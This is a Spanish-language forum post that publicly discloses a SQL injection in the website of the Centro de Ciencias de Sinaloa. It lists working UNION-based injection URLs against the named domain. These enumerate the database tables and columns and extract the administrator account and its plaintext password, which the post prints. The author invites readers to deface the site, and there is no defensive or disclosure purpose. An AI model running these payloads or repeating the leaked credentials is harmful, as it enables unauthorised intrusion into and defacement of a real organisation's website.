SQL Injecction en el Centro de Ciencias de Sinaloa

Chicos me puse a buscar vulnerabilidades y bueno consegui que la web oficial de el Centro de ciencias de Sinaloa es Vulnerable, en seguida dejo los detalles.

Web: http://www.ccs.net.mx

Buscando tablas
http://www.ccs.net.mx/comunicado.php?id=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9--
 
Listando tablas
http://www.ccs.net.mx/comunicado.php?id=-1%20union%20all%20select%201,2,group_concat(table_name),4,5,6,7,8,9%20from%20information_schema.tables--

La tabla que nos interesa esta en la 35 jeje.
http://www.ccs.net.mx/comunicado.php?id=-1%20union%20select%200,1,table_name,3,4,5,6,7,8%20from%20information_schema.tables%20limit%20%2035,1--

Listando columnas de usuarios
http://www.ccs.net.mx/comunicado.php?id=-1%20union%20all%20select%201,2,group_concat(column_name),4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=char(117,115,117,97,114,105,111,115)

Ahora comensamos a listar lo que mas nos interesa.

idusuario
http://www.ccs.net.mx/comunicado.php?id=-1%20union%20all%20select%201,2,idusuario,4,5,6,7,8,9%20from%20usuarios--
1

cuenta
http://www.ccs.net.mx/comunicado.php?id=-1%20union%20all%20select%201,2,cuenta,4,5,6,7,8,9%20from%20usuarios--
admin

password
http://www.ccs.net.mx/comunicado.php?id=-1%20union%20all%20select%201,2,password,4,5,6,7,8,9%20from%20usuarios--
web


Chicos yo no estoy muy metido en el deface si tampoco tengo mucha experiencia en ello jeje, solo que no borren cosas es malo para la familia y para la salud jejeje.

Visiten: http://www.razainformatica.org

Saludos.